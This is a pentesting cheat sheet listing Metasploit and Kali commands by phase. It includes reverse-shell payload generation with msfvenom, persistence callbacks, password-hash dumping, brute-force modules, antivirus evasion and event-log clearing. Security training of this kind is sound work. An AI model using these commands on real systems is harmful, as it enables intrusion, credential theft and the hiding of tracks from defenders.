[Learning] Pentester's Cheat Sheet: Mastering Kali Linux and Metasploit

Table of Contents

1. Introduction

   • Overview of Kali Linux
   • Importance of Metasploit in Penetration Testing
   • Setting Up Your Kali Environment

2. Getting Started with Metasploit

   • Guidelines:
     • Always update Metasploit to ensure access to the latest exploits and modules.
     • Familiarize yourself with the basic structure of the Metasploit Framework (MSF).
   • Commands:
     • msfconsole - Launch Metasploit.
     • help - List available commands.
     • search <keyword> - Search for specific modules.
     • use <module> - Load a module for use.
     • info <module> - Get detailed information about a module.

3. Understanding Metasploit Architecture

   • Guidelines:
     • Understand the role of different modules: exploits, payloads, auxiliaries, etc.
     • Utilize the database to track and manage your penetration testing efforts.
   • Commands:
     • db_status - Check database connection status.
     • hosts - List all hosts in the database.
     • services - List all services discovered on hosts.
     • vulns - List all vulnerabilities identified.

4. Information Gathering

   • Guidelines:
     • Conduct thorough reconnaissance before attempting any exploitation.
     • Use both active and passive information-gathering techniques.
   • Commands:
     • nmap -sP <target> - Ping sweep using Nmap.
     • use auxiliary/scanner/portscan/tcp - TCP port scanning.
     • use auxiliary/scanner/smtp/smtp_version - Enumerate SMTP version.
     • snmp_login - Use to brute-force SNMP community strings.

5. Vulnerability Scanning

   • Guidelines:
     • Integrate with other vulnerability scanners like Nexpose for comprehensive assessments.
     • Analyze scan results carefully to prioritize high-risk vulnerabilities.
   • Commands:
     • use auxiliary/scanner/vuln/ms08_067_netapi - Scan for MS08-067 vulnerability.
     • nexpose_connect <user>:<password>@<host> - Connect Metasploit to Nexpose.
     • db_import <file> - Import scan results from external tools.

6. Exploitation

   • Guidelines:
     • Always test exploits in a controlled environment before deploying them.
     • Use resource scripts to automate repetitive tasks.
   • Commands:
     • use exploit/windows/smb/ms08_067_netapi - Use MS08-067 exploit.
     • set RHOST <target IP> - Set target IP address.
     • exploit - Run the exploit.
     • resource <script.rc> - Execute a series of commands from a script.

7. Payloads and Shells

   • Guidelines:
     • Choose payloads based on the environment and security controls in place.
     • Meterpreter is versatile for post-exploitation; learn its commands well.
   • Commands:
     • set PAYLOAD windows/meterpreter/reverse_tcp - Set Meterpreter as the payload.
     • sessions -i <id> - Interact with an active session.
     • upload <local file> <remote path> - Upload a file to the target.
     • hashdump - Dump password hashes from the target.

8. Post-Exploitation

   • Guidelines:
     • Focus on escalating privileges and maintaining access to the compromised system.
     • Always clean up after your activities to avoid detection.
   • Commands:
     • getsystem - Attempt to escalate privileges on the target.
     • run post/windows/gather/credentials/windows_autologin - Gather credentials.
     • persistence -U -i 5 -p 4444 -r <your IP> - Set up persistent access.
     • clearev - Clear event logs on the target system.

9. Metasploit for Web Application Testing

   • Guidelines:
     • Focus on common web vulnerabilities like SQL injection and XSS.
     • Use Metasploit's web-related auxiliary and exploit modules.
   • Commands:
     • use auxiliary/scanner/http/sql_injection - Scan for SQL injection vulnerabilities.
     • use exploit/multi/http/php_cgi_arg_injection - Exploit PHP CGI Argument Injection.
     • set RHOSTS <target> - Specify the target web application.

10. Social Engineering with Metasploit

    • Guidelines:
      • Always get consent before conducting social engineering tests.
      • Combine Metasploit with the Social Engineering Toolkit (SET) for advanced attacks.
    • Commands:
      • use auxiliary/server/browser_autopwn - Exploit browsers via social engineering.
      • use auxiliary/spoof/fakeap - Set up a fake access point.
      • use auxiliary/server/capture/pop3 - Capture POP3 credentials.

11. Database and Credential Attacks

    • Guidelines:
      • Target databases with weak configurations or outdated software.
      • Use brute force and dictionary attacks with caution to avoid detection.
    • Commands:
      • use auxiliary/scanner/mysql/mysql_version - Identify MySQL version.
      • use auxiliary/scanner/mssql/mssql_login - Brute force MSSQL credentials.
      • use auxiliary/scanner/ssh/ssh_login - SSH login brute force.

12. Bypassing Anti-Virus and Firewalls

    • Guidelines:
      • Use evasion techniques to bypass AV and firewall defenses.
      • Encode payloads and use obfuscation techniques to avoid detection.
    • Commands:
      • set ENCODER x86/shikata_ga_nai - Use an encoder to obfuscate payloads.
      • msfvenom -p windows/meterpreter/reverse_tcp LHOST=<your IP> -e x86/shikata_ga_nai -f exe > payload.exe - Create an encoded payload.
      • use exploit/windows/smb/smb_relay - Relay SMB authentication to bypass firewalls.

13. Advanced Metasploit Techniques

    • Guidelines:
      • Customize Metasploit by writing your own modules for specific scenarios.
      • Automate common tasks using scripts or the Metasploit API.
    • Commands:
      • edit <module> - Edit an existing module.
      • msfvenom - Generate custom payloads.
      • use post/multi/manage/migrate - Migrate Meterpreter to another process.

14. Reporting and Documentation

    • Guidelines:
      • Document every step of your penetration test for accountability and review.
      • Use Metasploit’s built-in reporting features to generate detailed reports.
    • Commands:
      • sessions -l -v - List active sessions with detailed information.
      • loot - List all captured data.
      • db_export -f xml -a <filename.xml> - Export database contents to XML.

15. Resources for Continued Learning

    • Guidelines:
      • Stay updated with the latest developments in Metasploit and Kali Linux.
      • Engage with the community for tips, scripts, and troubleshooting.
    • Resources:
      • Offensive Security Training
      • Metasploit Unleashed
      • Kali Linux Documentation

Appendices

• A. Common Metasploit Commands
  • search <term> - Search for modules.
  • back - Exit current context/module.
  • jobs -l - List running jobs.
  • spool <filename> - Save console output to a file.
• B. Useful Scripts and Tools
  • resource <script> - Execute a script of Metasploit commands.
  • msfvenom - Standalone payload generator.
  • msfupdate - Update Metasploit to the latest version.
• C. Cheat Sheets and Quick Reference Guides
  • Metasploit Cheat Sheet
  • Kali Linux Cheat Sheet